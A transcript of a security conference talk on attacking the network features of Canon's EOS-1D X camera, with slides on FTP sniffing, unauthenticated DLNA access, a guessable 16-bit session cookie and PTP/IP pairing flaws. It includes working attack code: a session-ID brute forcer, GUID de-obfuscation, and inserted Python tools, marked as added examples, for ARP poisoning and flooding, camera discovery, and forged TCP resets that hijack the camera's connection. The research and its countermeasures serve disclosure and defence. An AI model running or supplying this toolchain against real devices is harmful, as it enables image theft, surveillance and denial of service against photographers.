[HES2013] Paparazzi over ip by Daniel Mende

Almost every recent higher-class DSLR camera features multiple and complex access technologies. For example, Canon's new flagship features IP connectivity both wired via 802.3 and wireless via 802.11. All big vendors are pushing these features to the market and advertise them as real-time image transfer to the cloud. We have taken a look at the layer 2 and 3 implementations in the CamOS and the services running on top of them. Not only did we discover weak plaintext protocols used in the communication, we have also been able to gain complete control of the camera, including modification of camera settings, file transfer and image live stream. So in the end the "upload to the clouds" feature resulted in an image-stealing Man-in-the-Imageflow. We will present the results of our research on cutting-edge cameras, exploit the weaknesses in a live demo and release a tool after the presentation.

Audio available here: http://2013.hackitoergosum.org/presentations/Day2-03.Paparazzi%20over%20IP%20by%20Daniel%20Mende.mp3
More information about the conference: https://www.hackitoergosum.org

HackitoErgoSum

May 03, 2013

Transcript

  1. www.ernw.de
    Paparazzi over IP
    Daniel Mende
    [email protected]

  2.
    Who we are
    ¬ Old-school network geeks, working as security researchers for Germany-based ERNW GmbH
      - Independent
      - Deep technical knowledge
      - Structured (assessment) approach
      - Business-reasonable recommendations
      - We understand corporate
    ¬ Blog: www.insinuator.net
    ¬ Conference: www.troopers.de
    5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #2

  3.
    Agenda
    ¬ Intro
    ¬ Transport Protocols
    ¬ Communication Modes & Attacks
    ¬ Conclusions

  4.
    Intro
    ¬ A number of current high-end cameras have network interfaces.
    ¬ We did some research on their security and potential attack paths.
    ¬ In the following we focus on Canon's new flagship, the EOS-1D X, but similar problems might be found in other models and at other vendors, too.

  5.
    The Camera
    Canon EOS-1D X

  6.
    The Camera
    A Bit of Marketing
    ¬ From Canon USA:
      - "A built in Ethernet port allows for fast, easy transfer of images directly to a PC or via a network to clients from live events."
      - "The EOS-1D X is compatible with the new WFT-E6A Wireless File Transmitter for wireless LAN transfer with the IEEE 802.11 a/b/g/n standards."

  7.
    The Camera
    The Ethernet Port

  8.
    The Camera
    WLAN Adapter

  9.
    The Target
    aka. Mr. Reuters

  10.
    The Target
    What if
    ¬ One could get the real, unedited images first.
    ¬ One could upload (bad) images.
    ¬ One could turn the camera into a surveillance device.

  11.
    Transport
    The underlying Protocols

  12.
    Transport
    ¬ Wired LAN via the built-in Ethernet port or wireless LAN via the WFT-E6A.
    ¬ Standard TCP/IP (no IPv6, yet).

  13.
    Traditional Attacks
    Layer 2
    ¬ ARP spoofing possible.
      - No "sticky" ARP entries
    ¬ ARP flooding with ~100 packets per second DoSes the network stack.
    ¬ By the way, the stack also dies if IPv6 (multicast) traffic is present.
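What the layer-2 attack on this slide looks like on the wire, as an added example that is not from the deck or ERNW's tool: it builds the unsolicited ARP replies that poison the camera's and the host's caches, decodes them as a sniffer would, and wraps the periodic resend a flood would use. All addresses are constructed for the example, and the send function assumes Linux AF_PACKET raw sockets and root.

```python
import struct

# Constructed example addresses (not from the slides): the camera, the
# photographer's upload/EOS Utility host, and the attacker's own interface.
CAMERA_IP, CAMERA_MAC = "192.168.1.103", "00:11:22:33:44:55"
HOST_IP, HOST_MAC = "192.168.1.10", "66:77:88:99:aa:bb"
ATTACKER_MAC = "de:ad:be:ef:00:01"

ETH_P_ARP = 0x0806
ARP_REPLY = 2


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def ip_bytes(ip):
    return bytes(int(o) for o in ip.split("."))


def arp_reply_frame(sender_ip, sender_mac, target_ip, target_mac):
    """Ethernet frame with an unsolicited ARP reply "sender_ip is-at
    sender_mac", unicast to target_mac. Spoofing means lying in sender_mac."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    # htype=Ethernet, ptype=IPv4, hlen=6, plen=4, oper=reply
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame):
    """Decode an ARP frame; these are the fields a host (or an IDS) sees."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    oper = struct.unpack("!H", frame[20:22])[0]
    mac = lambda b: ":".join("%02x" % x for x in b)
    ip = lambda b: ".".join(str(x) for x in b)
    return {"op": oper,
            "sender_mac": mac(frame[22:28]), "sender_ip": ip(frame[28:32]),
            "target_mac": mac(frame[32:38]), "target_ip": ip(frame[38:42])}


def poison_frames():
    """The two replies that place the attacker between camera and host:
    the camera learns HOST_IP at ATTACKER_MAC and the host learns CAMERA_IP
    at ATTACKER_MAC. Without sticky entries both caches simply overwrite."""
    return [arp_reply_frame(HOST_IP, ATTACKER_MAC, CAMERA_IP, CAMERA_MAC),
            arp_reply_frame(CAMERA_IP, ATTACKER_MAC, HOST_IP, HOST_MAC)]


def send_frames(frames, iface, interval, count):
    """Transmit on a Linux interface (AF_PACKET needs root). Re-sending every
    second or so keeps a non-sticky cache poisoned; the same loop with two
    frames and interval=0.02 is the ~100 pps flood the slide says kills the
    camera's stack."""
    import socket
    import time
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        for _ in range(count):
            for f in frames:
                s.send(f)
            time.sleep(interval)


if __name__ == "__main__":
    for f in poison_frames():
        print(parse_arp(f))
```

The frames are plain 42-byte Ethernet/ARP, so `parse_arp` doubles as the detection side: a reply whose sender MAC differs from the MAC previously seen for that IP is exactly the event a monitoring tool would alert on.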

  14.
    Traditional Attacks
    Layer 3/4
    ¬ TCP/IP is used for all network communication.
    ¬ Established connections can be killed via TCP RST.

  15.
    Communication Modes

  16.
    Communication Modes
    Overview
    ¬ FTP Upload Mode
    ¬ DLNA
    ¬ Built-in webserver
    ¬ EOS Utility

  17.
    FTP Upload Mode

  18.
    FTP Upload Mode
    Mode of operation
    ¬ Target server and credentials are configured on the camera.
    ¬ Photos taken are uploaded to the server immediately.

  19.
    FTP Upload Mode
    Downside
    ¬ As FTP is clear text, credentials can be sniffed.
    ¬ So can the complete data transmission.
    ¬ Uploaded pictures can be extracted from network traffic.

  22.
    DLNA mode

  23.
    DLNA mode
    Overview
    ¬ Digital Living Network Alliance®
    ¬ UPnP used for discovery.
    ¬ DLNA guidelines for file formats, encodings, resolutions.
    ¬ HTTP and XML used to access media.

  24.
    DLNA mode
    Cons
    ¬ No authentication.
    ¬ No restrictions.
    ¬ Every DLNA client can download _all_ images.
    ¬ Your browser could be a DLNA client. Or somebody else's browser. For your camera.
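How "every DLNA client" finds the camera's media server, as an added example that is not part of the deck: it builds the SSDP M-SEARCH a client multicasts, parses the replies, and carries a constructed sample reply so the parser can be exercised offline. The IP, port and SERVER string in the sample are invented for the example; the camera's real values are not on the page.

```python
import socket

SSDP_ADDR, SSDP_PORT = "239.255.255.250", 1900
MEDIA_SERVER = "urn:schemas-upnp-org:device:MediaServer:1"


def build_msearch(search_target=MEDIA_SERVER, mx=2):
    """The HTTPU M-SEARCH every DLNA client multicasts; nothing in it
    identifies or authenticates the sender."""
    lines = ["M-SEARCH * HTTP/1.1",
             "HOST: %s:%d" % (SSDP_ADDR, SSDP_PORT),
             'MAN: "ssdp:discover"',
             "MX: %d" % mx,
             "ST: %s" % search_target,
             "", ""]
    return "\r\n".join(lines).encode("ascii")


def parse_ssdp_response(data):
    """Header dict of an SSDP '200 OK'. LOCATION is the device description
    XML; from there the ContentDirectory service and every image URL follow."""
    text = data.decode("utf-8", "replace")
    status, _, rest = text.partition("\r\n")
    if not status.startswith("HTTP/1.1 200"):
        raise ValueError("unexpected status line: %r" % status)
    headers = {}
    for line in rest.split("\r\n"):
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().upper()] = value.strip()
    return headers


def discover(timeout=3.0):
    """Send one M-SEARCH and return [(ip, headers), ...] for all responders."""
    found = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) as s:
        s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
        s.settimeout(timeout)
        s.sendto(build_msearch(), (SSDP_ADDR, SSDP_PORT))
        while True:
            try:
                data, addr = s.recvfrom(4096)
            except socket.timeout:
                break
            try:
                found.append((addr[0], parse_ssdp_response(data)))
            except ValueError:
                continue
    return found


# Constructed reply (values invented for this example, not a capture)
SAMPLE_REPLY = (b"HTTP/1.1 200 OK\r\n"
                b"CACHE-CONTROL: max-age=1800\r\n"
                b"EXT:\r\n"
                b"LOCATION: http://192.168.1.103:49152/description.xml\r\n"
                b"SERVER: ExampleOS/1.0 UPnP/1.0 DLNADOC/1.50\r\n"
                b"ST: urn:schemas-upnp-org:device:MediaServer:1\r\n"
                b"USN: uuid:00000000-0000-0000-0000-000000000000::"
                b"urn:schemas-upnp-org:device:MediaServer:1\r\n\r\n")

if __name__ == "__main__":
    for ip, hdr in discover():
        print(ip, hdr.get("SERVER"), hdr.get("LOCATION"))
```

Run on the camera's LAN, `discover()` lists every MediaServer that answers; since the slide says there is no authentication, the LOCATION URL is all a client needs to walk the ContentDirectory and fetch the images.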

  25.
    Built-in webserver
    Always a good idea…

  26.
    Built-in webserver
    Canon WFT Server
    ¬ Wireless File Transmitter Server Mode.
    ¬ Canon USA: "Use a web browser to capture, view and download images remotely"

  27.
    Built-in webserver
    Canon WFT Server
    ¬ Browser interface uses AJAX.
    ¬ Embedded webserver is only capable of the HTTP GET method.
      - Every other request method is answered with a 404.

  28.
    Built-in webserver
    Authentication
    ¬ Authentication via HTTP Basic (RFC 2617) on the login page.
    ¬ A session cookie is used afterwards.
    ¬ Cookie looks like sessionID=40b1
      - 4 (!!!) hex digit session ID, i.e. 16 bits
      - 65536 possible IDs (0000 to ffff)

  29.
    Built-in webserver
    ¬ Session ID brute force implemented in 6 lines of Python.
    ¬ Checking all possible IDs takes about 20 minutes.
      - The embedded webserver is not that responsive.

  30.
    import requests

    # Any endpoint behind the session check works as an oracle; the camera
    # answers with SESSION_ERR when the cookie is unknown.
    target_uri = 'http://192.168.1.103/api/cam/lvoutput'
    target_string = 'SESSION_ERR'

    # The cookie is four hex digits, so the whole 16-bit space is 0x0000..0xffff;
    # zero-pad to match the camera's own cookie format.
    for i in range(0x10000):
        if i != 0 and i % 1000 == 0:
            print('%d IDs checked' % i)
        r = requests.get(target_uri, cookies={'sessionID': '%04x' % i})
        if target_string not in r.text:
            print('SessionID is : sessionID=%04x' % i)
            break

  32.
    Built-in webserver
    Recap
    ¬ Full access to Live View, stored photos and camera settings.
    ¬ You surf – we brute.

  33.
    Built-in webserver
    Requirements
    ¬ Camera in WFT Server mode.
    ¬ Valid session opened by a user.
    ¬ Some minutes of time.

  34.
    EOS Utility mode
    aka. I wanna be root

  35.
    EOS Utility mode
    The Utility

  36.
    EOS Utility mode
    The Utility

  37.
    EOS Utility mode
    Overview
    ¬ Allows remote control of all non-manual camera functions.
    ¬ Pictures can be up- and downloaded.
    ¬ Possibly even more (sound recording anyone?)

  38.
    EOS Utility mode
    Technical
    ¬ SSDP and mDNS used for discovery.
    ¬ PTP/IP used for communication.
    ¬ Needs initial camera-software pairing.

  39.
    EOS Utility mode
    Pairing
    ¬ At first use, credentials need to be exchanged between the camera and the client software.
    ¬ Camera must be put into pairing mode via the camera menu.
    ¬ Camera signals the need for pairing via mDNS.

  41.
    EOS Utility mode
    Pairing

  42.
    EOS Utility mode
    Pairing
    ¬ Client software connects to the camera via PTP/IP.
    ¬ PTP/IP authentication is successful regardless of the credentials.
    ¬ Credentials (hostname, GUID) are stored on the camera.

  43.
    PTP/IP
    Feels like USBoIP )-:

  44.
    PTP/IP
    ¬ Picture Transfer Protocol over Internet Protocol.
    ¬ Carries PTP (ISO 15740, standardized by the International Imaging Industry Association) over TCP; the PTP/IP transport itself is specified by CIPA as DC-005.

  45.
    PTP/IP
    Packet format
    ¬ Wrapper for PTP with header:
      - 4 byte length (little endian, counts the header too)
      - 4 byte type (little endian)
      - data

  46.
    PTP/IP
    Layering

  47.
    PTP/IP
    Authentication
    ¬ PTPIP_INIT_COMMAND_REQUEST
      - Includes authentication data:
        16 byte GUID
        hostname string

  48.
    PTPIP_INIT_COMMAND_REQUEST
    2a 00 00 00 01 00 00 00 eb 7a 78 9d 69 cb 64 4e
    a3 e0 fc 96 ef 59 79 42 73 00 65 00 72 00 76 00
    65 00 72 00 00 00 00 00 01 00
    Packet length = 42 byte (2a 00 00 00)
    Packet type = 0x01 = PTPIP_INIT_COMMAND_REQUEST (01 00 00 00)
    GUID = eb 7a 78 9d 69 cb 64 4e a3 e0 fc 96 ef 59 79 42
    Hostname = "server" as NUL-terminated UTF-16LE (73 00 ... 72 00 00 00)
    Trailer = PTP/IP protocol version 1.0 (00 00 01 00, little endian 0x00010000)

  49.
    PTP

  50.
    PTP
    Explained
    ¬ Picture Transfer Protocol
    ¬ Standardized by the International Imaging Industry Association
    ¬ ISO 15740
    ¬ Lots of proprietary vendor extensions.

  51.
    PTP
    Packet format
    ¬ Designed for use over USB
    ¬ Fixed length
    ¬ 2 byte Msg Code
    ¬ 4 byte Session ID
    ¬ 4 byte Transaction ID
    ¬ 5 times 4 byte Parameter or Data

  52.
    PTP
    Message Codes
    ¬ Lots of standardized codes like:
      - PTP_GetDeviceInfo
      - PTP_OpenSession
      - PTP_CloseSession
      - PTP_GetStorageIDs
    ¬ Also vendor-specific codes like:
      - PTP_CANON_GetCustomizeSpec
      - PTP_CANON_GetCustomizeItemInfo

  53.
    PTP
    Use of
    ¬ Thankfully there are some implementations around.
    ¬ We decided to go with libgphoto2.
    ¬ Basic PTP/IP support is included as well.

  54.
    The Attack
    aka. gotcha

  55.
    Attack
    Getting the Credentials
    ¬ Client hostname easily discoverable, but not needed.
      - Camera also accepts connections with a different hostname.
    ¬ GUID unknown to the client software.
    ¬ Obfuscated GUID is broadcast by the camera itself in its UPnP/mDNS announcements.

  57.
    # The mDNS TXT record 'tid.canon.com' carries the GUID in the usual
    # dashed text form (for the value below: 9d787aeb-cb69-4e64-a3e0-fc96ef597942).
    # The first three groups are stored byte-swapped, so reverse each of them
    # and concatenate the last two as they are.
    tmp = mdns_info.getProperties()['tid.canon.com'].split('-')
    swap = lambda s: [s[i:i + 2] for i in range(0, len(s), 2)][::-1]
    guid = []
    for i in range(0, 3):
        guid += swap(tmp[i])
    guid += [tmp[3], tmp[4]]
    guid = "".join(guid)
    # guid == 'eb7a789d69cb644ea3e0fc96ef597942'
    # (the same as uuid.UUID(text).bytes_le.hex() from the standard library)

  58.
    The Attack
    Connecting to the Camera
    ¬ Camera only allows one connection.
    ¬ The already connected client needs to be disconnected.
    ¬ TCP-RST the established PTP/IP connection.
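The TCP RST that knocks the EOS Utility off the camera, as an added example that is not the deck's tool: it builds an IPv4/TCP reset with correct checksums for either direction of the session and decodes it for verification. Endpoints and sequence numbers are constructed for the example; PTP/IP's TCP port 15740 comes from the protocol specification, and in practice the sequence numbers are read off the live session (which the ARP spoofing earlier in the deck makes visible). Sending assumes Linux raw sockets and root.

```python
import struct

# Constructed example endpoints (not from the slides). PTP/IP listens on
# TCP port 15740; the sequence numbers would come from sniffing the session.
CAMERA = ("192.168.1.103", 15740)
CLIENT = ("192.168.1.10", 50000)


def checksum(data):
    """RFC 1071 one's-complement sum over 16-bit big-endian words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ip_bytes(ip):
    return bytes(int(o) for o in ip.split("."))


def build_rst(src, dst, seq, ttl=64):
    """IPv4 packet carrying a bare TCP RST from src=(ip, port) to dst.
    The receiver only honours it if seq is inside its window (RFC 793),
    so seq should be the next sequence number the victim expects from its
    peer, i.e. the peer's most recent ACK value seen on the wire."""
    # TCP header: ports, seq, ack=0, data offset 5 words, flags=RST (0x04),
    # window 0, checksum placeholder, urgent pointer 0
    tcp = struct.pack("!HHIIBBHHH", src[1], dst[1], seq, 0, 5 << 4, 0x04, 0, 0, 0)
    pseudo = ip_bytes(src[0]) + ip_bytes(dst[0]) + struct.pack("!BBH", 0, 6, len(tcp))
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp)) + tcp[18:]
    # IPv4 header: version/IHL, TOS, total length, id, DF, TTL, proto=TCP, csum
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0x4000, ttl, 6, 0,
                     ip_bytes(src[0]), ip_bytes(dst[0]))
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip + tcp


def parse_rst(pkt):
    """Decode the packet and verify both checksums, as a sniffer (or the
    victim's stack) would before acting on it."""
    ihl = (pkt[0] & 0x0F) * 4
    ip_hdr, tcp = pkt[:ihl], pkt[ihl:]
    if checksum(ip_hdr) != 0:
        raise ValueError("bad IP checksum")
    src, dst = pkt[12:16], pkt[16:20]
    if checksum(src + dst + struct.pack("!BBH", 0, 6, len(tcp)) + tcp) != 0:
        raise ValueError("bad TCP checksum")
    sport, dport, seq, _ack, off_flags = struct.unpack("!HHIIH", tcp[:14])
    return {"src": ".".join(map(str, src)), "sport": sport,
            "dst": ".".join(map(str, dst)), "dport": dport,
            "seq": seq, "rst": bool(off_flags & 0x0004)}


def rst_pair(client_next_seq, camera_next_seq):
    """Tear the session down at both ends: a RST to the camera that looks
    like it came from the client, and one to the client that looks like it
    came from the camera."""
    return [build_rst(CLIENT, CAMERA, client_next_seq),
            build_rst(CAMERA, CLIENT, camera_next_seq)]


def send_raw(pkt, dst_ip):
    """Linux/root: IPPROTO_RAW implies IP_HDRINCL, so our own header is used."""
    import socket
    with socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) as s:
        s.sendto(pkt, (dst_ip, 0))


if __name__ == "__main__":
    for p in rst_pair(0x1A2B3C4D, 0x0BADCAFE):
        print(parse_rst(p))
```

Once the camera has dropped the old connection, the attacker's own PTP/IP INIT_COMMAND_REQUEST with the de-obfuscated GUID is accepted, which is the "Connect via PTP/IP" step on the next slide.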

  59.
    Attack
    Process
    ¬ Listen for the camera on mDNS.
    ¬ De-obfuscate the authentication data.
    ¬ Disconnect the connected client software.
    ¬ Connect via PTP/IP.
    ¬ Have phun (-;

  61.
    Attack outlined
    So you can write it down
    ¬ Photographer uses hotel / Starbucks WLAN, which isn't unlikely during events (think of the Grammy Awards a few days ago).
    ¬ Almost anybody in the same LAN can download the images from the camera (and even more).

  62.
    Countermeasures
    ¬ Enable network functionality only in trusted networks.
    ¬ Use WPA and a secure passphrase for (your trusted) WLAN.

  63.
    Conclusions
    ¬ High-end cameras are yet another daily-life item equipped with networking capabilities incl. full-blown IP stacks.
    ¬ Once more, their device-specific network technologies have been designed and implemented without (too much) security in mind.
    ¬ Again, this leads to (classes of) attacks previously unknown to their non-networked counterparts.

  64.
    Next Steps
    ¬ New series of DSLRs (EOS 6D)
      - Built-in wireless access point
      - New communication protocol for the iOS/Android app
    ¬ New series of camcorders (XA20, XA25)

  65.
    There’s never enough time…
    THANK YOU… ...for yours!

  66.
    Questions?